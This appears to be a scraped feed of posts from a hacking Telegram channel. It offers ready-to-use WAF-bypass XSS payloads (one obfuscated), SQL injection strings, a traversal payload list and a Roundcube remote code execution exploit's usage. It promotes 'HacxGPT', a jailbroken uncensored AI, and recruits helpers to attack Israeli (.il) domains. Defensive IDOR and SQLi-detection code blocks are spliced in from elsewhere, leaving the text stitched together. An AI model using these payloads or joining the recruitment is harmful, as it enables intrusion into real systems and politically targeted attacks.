XSS Payload Bypassing Cloudflare WAF on Next.js 14.1.4
Payload:
β>alert(154)</script><script/154=β;;;;;;;
#XSS #Bypass
Fortinet Fortigate XSS Bypass
Payload:
<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a()%20x>
#XSS #Bypass
Blackbird is a robust OSINT tool that facilitates rapid searches for user accounts by username or email across a wide array of platforms, enhancing digital investigations. It features WhatsMyName integration, export options in PDF, CSV, and HTTP response formats, and customizable search filters.
cd blackbird
pip install -r requirements.txt
# Search by username
python blackbird.py --username username1 username2 username3
# Search by email
python blackbird.py --email email1@email.com email2@email.com email3@email.com
# Export results to PDF
python blackbird.py --email email1@email.com --pdf
Blackbird uses AI-powered NER models to improve metadata extraction, identifying key entities for faster and more accurate insights.
python blackbird.py --username username1 --ai
#Python #Osint #Tools
How to extract urls, srcs and hrefs from all HTML elements in any website? Open DevTools and run:
// $$ is the DevTools console shorthand for document.querySelectorAll
const urls = [];
$$('*').forEach(element => {
  urls.push(element.src);   // <img>, <script>, <iframe>, <video>, ...
  urls.push(element.href);  // <a>, <link>, <area>, ...
  urls.push(element.url);   // not a standard DOM property; kept from the original, normally undefined
});
// drop undefined/empty entries and print each distinct value once
console.log(...new Set(urls.filter(Boolean)));
#js #extract #urls
┌──(BugCod3㉿kali)-[~]
└─$ sudo rm -rf *2024
┌──(BugCod3㉿kali)-[~]
└─$ sudo mkdir 2025
#Notification #NewYear
CVE-2024-55591
A Fortinet FortiOS Authentication Bypass Vulnerable Behaviour Detection
Description:
This script attempts to create a WebSocket connection at a random URI from a pre-authenticated perspective to the FortiOS management interface, and reviews the response to determine if the instance is vulnerable.
Affected Versions:
▪️ FortiOS 7.0.0 through 7.0.16
▪️ FortiProxy 7.0.0 through 7.0.19
▪️ FortiProxy 7.2.0 through 7.2.12
Github
Download
#Python #CVE #Vulnerable #Detection
HExHTTP
HExHTTP is a tool designed to perform tests on HTTP headers and analyze the results to identify vulnerabilities and interesting behaviors.
Features:
▪️ Server Error response checking
▪️ Localhost header response analysis
▪️ Vhosts checking
▪️ Methods response analysis
▪️ HTTP Version analysis [Experimental]
▪️ Cache Poisoning DoS (CPDoS) techniques
▪️ Web cache poisoning
▪️ Range poisoning/error (416 response error) [Experimental]
▪️ Cookie Reflection
▪️ CDN/proxies Analysis (Envoy/Apache/Akamai/Nginx) [IP]
Installation:
pip install -r requirements.txt
Usage:
./hexhttp.py -u 'https://target.tld/'
# OR
python3 hexhttp.py -u 'https://target.tld/'
./hexhttp.py -h
# Usage: hexhttp.py [-h] [-u URL] [-f URL_FILE] [-H CUSTOM_HEADER] [-A USER_AGENT] [-F] [-a AUTH] [-b]
Github
Download
#Python #HTTP #Headers #Analyze
IDOR-Forge
IDOR Forge is an advanced and versatile tool designed to detect Insecure Direct Object Reference (IDOR) vulnerabilities in web applications.
Description:
IDOR Forge is a powerful and versatile tool designed to detect Insecure Direct Object Reference (IDOR) vulnerabilities in web applications. IDOR vulnerabilities occur when an application exposes direct references to internal objects (e.g., database keys, file paths) without proper authorization checks, allowing attackers to access unauthorized data. This tool automates the process of identifying such vulnerabilities by dynamically generating and testing payloads, analyzing responses, and reporting potential issues.
Features:
▪️ Dynamic Payload Generation
▪️ Multi-Parameter Scanning
▪️ Support for Multiple HTTP Methods
▪️ Concurrent Scanning
▪️ Rate Limiting Detection
▪️ Customizable Test Values
▪️ Sensitive Data Detection
▪️ Proxy Support
▪️ Interactive GUI Mode
▪️ Verbose Mode
▪️ Output Options
▪️ Custom Headers
▪️ Session Handling
Installation:
pip install -r requirements.txt
Usage:
python IDOR-Forge.py
# CLI Basic Usage
python IDOR-Forge.py -u "https://example.com/api/resource?id=1"
# Advanced Usage
python IDOR-Forge.py -u "https://example.com/api/resource?id=1" -p -m GET --proxy "http://127.0.0.1:8080" -v -o results.csv --output-format csv
python IDOR-Forge.py -u http://example.com/resource?id=1 -p -m GET --output results.csv --output-format csv --test-values [100,200,300] --sensitive-keywords ["password", "email"]
Interactive GUI Mode:
python idor_hunter.py --interactive
Github
Download
#Python #Idor #Vulnerability #Tools
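The description above defines an IDOR as a direct object reference (a database key in `?id=1`) that is served without an authorization check. As an added example, not IDOR-Forge's code or the channel's, the Python below shows a handler with exactly that defect beside two fixes: an ownership check that also hides whether a foreign id exists, and per-session opaque handles so the guessable key never appears in the URL at all. The users, invoice records and ids are constructed for the demo.

```python
"""Vulnerable and fixed object lookups for the IDOR class described above.
Added example, not IDOR-Forge's code; users, invoices and ids are constructed."""
import secrets
from dataclasses import dataclass
from typing import Callable, Dict, Optional


@dataclass(frozen=True)
class User:
    user_id: int
    role: str  # "user" or "admin"


# Constructed record store keyed by the direct object reference (the database id)
# that a request such as /api/resource?id=1 carries.
INVOICES: Dict[int, dict] = {
    1: {"owner_id": 10, "total": "42.00"},
    2: {"owner_id": 11, "total": "99.00"},
}


class Forbidden(Exception):
    """Raised when the caller may not read the requested object."""


def get_invoice_vulnerable(caller: User, invoice_id: int) -> dict:
    """Looks the record up by the id taken straight from the request.
    Authentication happened, authorization did not: any logged-in user can
    read any invoice just by changing the id. This is the IDOR."""
    return INVOICES[invoice_id]


def get_invoice_secure(caller: User, invoice_id: int) -> dict:
    """Same lookup, but the record must belong to the caller (or the caller is
    an admin). Unknown and foreign ids raise the same error, so a scanner
    cannot tell "exists but not yours" from "does not exist"."""
    record = INVOICES.get(invoice_id)
    if record is None or (record["owner_id"] != caller.user_id and caller.role != "admin"):
        raise Forbidden(f"user {caller.user_id} may not read invoice {invoice_id}")
    return record


class ReferenceMap:
    """Second mitigation: indirect references. Each session hands out random
    opaque handles that map back to real ids only on the server, so the
    sequential database key never appears in a URL."""

    def __init__(self) -> None:
        self._to_real: Dict[str, int] = {}

    def handle_for(self, real_id: int) -> str:
        handle = secrets.token_urlsafe(16)
        self._to_real[handle] = real_id
        return handle

    def resolve(self, handle: str) -> Optional[int]:
        return self._to_real.get(handle)


def list_my_invoices(caller: User, refmap: ReferenceMap) -> Dict[str, dict]:
    """Returns only the caller's invoices, keyed by fresh opaque handles."""
    return {refmap.handle_for(i): r for i, r in INVOICES.items() if r["owner_id"] == caller.user_id}


def get_invoice_by_handle(caller: User, refmap: ReferenceMap, handle: str) -> dict:
    """Resolves the handle server-side, then still applies the ownership check
    (defence in depth: a handle leaked from another session is not enough)."""
    real_id = refmap.resolve(handle)
    if real_id is None:
        raise Forbidden("unknown handle")
    return get_invoice_secure(caller, real_id)


def denied(fn: Callable, *args) -> bool:
    """Demo helper: True when the lookup is refused."""
    try:
        fn(*args)
    except Forbidden:
        return True
    return False


if __name__ == "__main__":
    alice, bob = User(10, "user"), User(11, "user")
    print("vulnerable: bob reads alice's invoice ->", get_invoice_vulnerable(bob, 1))
    print("secure: bob denied ->", denied(get_invoice_secure, bob, 1))
    refmap = ReferenceMap()
    handle = next(iter(list_my_invoices(alice, refmap)))
    print("opaque handle for alice:", handle, "->", get_invoice_by_handle(alice, refmap, handle))
```

The ownership check is the fix that removes the bug; the opaque handle layer is optional hardening that also defeats the "increment the id" enumeration a scanner like the one above performs, and it is deliberately combined with the ownership check rather than relied on alone.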
Directory-Traversal-Payloads
List of Directory Traversal/LFI Payloads Scraped from the Internet
Github
Download
#Payload #Directory
WordPress A/B Image Optimizer 3.3 Plugin Arbitrary File Download Vulnerability
Category: web applications
Platform: php
Security Risk: High
WordPress Plugin A/B Image Optimizer plugin versions 3.3 and below suffers from an arbitrary file download vulnerability.
CVE: CVE-2025-25163
Download
#CVE #Exploit #PHP #WordPress
Extracts URLs from OSINT Archives for Security Insights.
Urx is a command-line tool designed for collecting URLs from OSINT archives, such as the Wayback Machine and Common Crawl.
Features:
▪️ Fetch URLs from multiple sources (Wayback Machine, Common Crawl, OTX)
▪️ Process multiple domains concurrently
▪️ Filter results by file extensions or patterns
▪️ Use presets (predefined filter sets) for convenience (like "no-image" to exclude all image-related extensions)
▪️ Multiple output formats (plain, JSON, CSV)
▪️ Output to console or file
▪️ Support for reading domains from stdin (pipeline integration)
▪️ URL testing capabilities (status checking, link extraction)
Installation:
cd urx
cargo build --release
Usage:
# Scan a single domain
urx example.com
# Scan multiple domains
urx example.com example.org
# Scan domains from a file
cat domains.txt | urx
Github
Download
#Osint #URL #Tools
CF-Hero
CF-Hero is a comprehensive reconnaissance tool developed to discover the real IP addresses of web applications protected by Cloudflare. It performs multi-source intelligence gathering through various methods.
Features:
▪️ DNS Reconnaissance
▪️ Third-party Intelligence
▪️ Advanced Features
Installation:
go install -v github.com/musana/cf-hero/cmd/cf-hero@latest
Usage:
# The most basic running command. It checks A and TXT records by default.
cat domains.txt | cf-hero
# or you can pass the "f" parameter to it.
cf-hero -f domains.txt
# Use the censys parameter to include Censys in the scan
cat domain.txt | cf-hero -censys
# Use the shodan parameter to include Shodan in the scan
cat domain.txt | cf-hero -shodan
# Use the securitytrails parameter to include SecurityTrails in the scan
cat domain.txt | cf-hero -securitytrails
Github
Download
#GO #Origin #IP #Tools
Blind SQL Injection
Tips:
1. Gather all URLs from gau/waybackurls and Google Dorking.
2. Inject the SQLi payload in all parameters one by one.
3. Analyze the response.
Payload used:
0'XOR(if(now()=sysdate(),sleep(10),0)) XOR'Z
#BugBounty #Payload #SQLi
Useful Wireshark Filters
#WireShark #Tips
SQL injection ID parameter
?id=1' order by 1 --+
?id=1' and "a"="a"--+
?id=1' and database()="security"--+
?id=1' and substring(database(),1,1)="a"--+
?id=1' and sleep(2) and "a"="a"--+
?id=1' and sleep(2) and substring(database(),1,1)="a"--+
#SQL #Injection #Tips
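The two SQL injection posts above (the blind time-based payload and the id parameter probes) show what gets sent; the defender's side is recognising those probes in logs and making them inert. As an added example that is not part of the channel's posts, the Python below scans constructed access-log lines for the probe styles shown on the page (comment terminators, quoted tautologies, `database()`/`sysdate()`/`now()` calls, `sleep()` delays, `ORDER BY n` column counting) and then contrasts a string-built query with a bound parameter in SQLite. The log lines, IP addresses, table and rows are all constructed; `SQLI_PATTERNS` and the function names are this example's own.

```python
"""Detection and mitigation for the SQL injection probes listed above.
Added example, not from the channel; log lines, table and addresses are constructed."""
import re
import sqlite3
from typing import Dict, List
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Indicators matching the probe styles on the page: trailing comment terminators,
# quoted tautologies, schema/time functions, sleep() delays and ORDER BY column counting.
SQLI_PATTERNS = [
    ("comment_terminator", re.compile(r"--\s*$|--\+")),
    ("tautology", re.compile(r"""\b(and|or|xor)\s*\(?\s*(["'])\w+\2\s*=\s*\2\w+\2""", re.I)),
    ("schema_probe", re.compile(r"\b(database|sysdate|now|version)\s*\(", re.I)),
    ("time_delay", re.compile(r"\bsleep\s*\(\s*\d+", re.I)),
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+", re.I)),
]

# Constructed Common Log Format lines; the client addresses are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jan/2025:12:00:01 +0000] "GET /product?id=1 HTTP/1.1" 200',
    '203.0.113.7 - - [10/Jan/2025:12:00:02 +0000] "GET /product?id=1%27+order+by+1+--+ HTTP/1.1" 500',
    '203.0.113.7 - - [10/Jan/2025:12:00:03 +0000] "GET /product?id=1%27+and+sleep(2)+and+%22a%22%3D%22a%22--+ HTTP/1.1" 200',
    '198.51.100.4 - - [10/Jan/2025:12:00:04 +0000] "GET /search?q=0%27XOR(if(now()%3Dsysdate(),sleep(10),0))+XOR%27Z HTTP/1.1" 200',
]

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')


def classify_value(value: str) -> List[str]:
    """Names of the indicators present in one parameter value. The value is decoded
    once more here so a double-encoded probe (%2527 for the quote) is still seen."""
    decoded = unquote_plus(value)
    return [name for name, pat in SQLI_PATTERNS if pat.search(decoded)]


def scan_access_log(lines) -> List[Dict]:
    """One finding per query parameter that carries at least one indicator."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, _ts, _method, target, status = m.groups()
        # parse_qsl performs the first percent/plus decode of each value
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            hits = classify_value(value)
            if hits:
                findings.append({"ip": ip, "param": name, "value": value,
                                 "indicators": hits, "status": int(status)})
    return findings


def demo_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for the application's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)", [(1, "widget"), (2, "gadget")])
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, raw_id: str) -> List[str]:
    """String-built SQL: the quote in the probe closes the literal and the rest runs as SQL."""
    return [r[0] for r in conn.execute(f"SELECT name FROM products WHERE id = '{raw_id}'")]


def lookup_safe(conn: sqlite3.Connection, raw_id: str) -> List[str]:
    """Bound parameter: the whole string is a single value, so the probe matches no row."""
    return [r[0] for r in conn.execute("SELECT name FROM products WHERE id = ?", (raw_id,))]


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['ip']} param={f['param']} status={f['status']} indicators={f['indicators']}")
    conn = demo_db()
    probe = "1' or '1'='1"
    print("string-built query returns:", lookup_vulnerable(conn, probe))
    print("parameterised query returns:", lookup_safe(conn, probe))
```

The status code is kept in each finding because the page's tip 3 ("analyze the response") cuts both ways: a 500 on a probe that contains `order by` is a strong signal the parameter reached the database unquoted, while a 200 with a multi-second latency on a `sleep()` probe is the blind case, which log-based detection can only see if response time is logged as well.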
How to use Gobuster to brute-force directories!
$ gobuster dir -u <target-URL> -w <wordlist>
dir: Directory scanning
-u: Target URL
-w: Path to wordlist file
Download
#GoBuster #Tips #Tools
WAF bypass for Akamai and Cloudflare
Payload:
<address onscrollsnapchange=window['ev'+'a'+(['l','b','c'][0])](window['a'+'to'+(['b','c','d'][0])]('YWxlcnQob3JpZ2luKQ==')); style=overflow-y:hidden;scroll-snap-type:x><div style=scroll-snap-align:center>1337</div></address>
#WAF #Akamai #Cloudflare
HacxGPT
The cutting-edge AI developed by BlackTechX, inspired by WormGPT, designed to push the boundaries of natural language processing.
Features:
▪️ Powerful AI Conversations: all questions will be answered in a good flow.
▪️ Broken AI: Can do anything you want!!
Installation:
sudo apt-get update; sudo apt-get upgrade -y
sudo apt-get install git wget python3 -y
cd Hacx-GPT
pip install -r requirements.txt
python3 main.py
Github
Download
#Ai #Hackers #Tools
CVE-2025-49113 - Roundcube Remote Code Execution
A proof-of-concept exploit for CVE-2025-49113, a remote code execution vulnerability in Roundcube Webmail.
Description:
This exploit targets a deserialization vulnerability in Roundcube Webmail versions 1.5.0 through 1.6.10. The vulnerability allows an authenticated attacker to execute arbitrary code on the server.
Vulnerable Versions:
▪️ 1.5.0 - 1.5.9
▪️ 1.6.0 - 1.6.10
Requirements:
▪️ PHP 7.0 or higher
▪️ cURL extension enabled
▪️ Target running a vulnerable version of Roundcube
Usage:
php CVE-2025-49113.php <url> <username> <password> <command>
Example:
php CVE-2025-49113.php http://localhost/roundcube/ admin password "id"
Github
Download
#CVE #PHP #RemoteCode
Hi π , friends who want to help us in attacking the
T.me/BugCod3BOT
.il domain address can provide their type of help in the bot below and contact us.T.me/BugCod3BOT